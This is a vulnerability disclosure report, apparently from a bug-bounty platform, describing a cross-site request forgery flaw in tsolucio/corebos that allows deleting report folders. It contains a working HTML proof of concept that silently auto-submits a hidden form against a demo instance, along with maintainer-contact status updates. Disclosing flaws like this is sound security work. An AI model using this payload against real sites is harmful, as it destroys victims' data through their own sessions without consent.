Cross-Site Request Forgery (CSRF) in tsolucio/corebos
Valid
Reported on
Dec 23rd 2021
Description
The lack of a CSRF token and validation of the request method gives the attacker the ability to delete DeleteReportFolder
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.corebos.com/index.php">
<input type="hidden" name="action" value="ReportsAjax" />
<input type="hidden" name="mode" value="ajax" />
<input type="hidden" name="file" value="DeleteReportFolder" />
<input type="hidden" name="module" value="Reports" />
<input type="hidden" name="record" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
The attacker has the ability to delete arbitrary report folders on behalf of the victim.
We are processing your report and will contact the
tsolucio/corebos
team within 24 hours.
2 years ago
We have contacted a member of the
tsolucio/corebos
team and are waiting to hear back
2 years ago
to join this conversation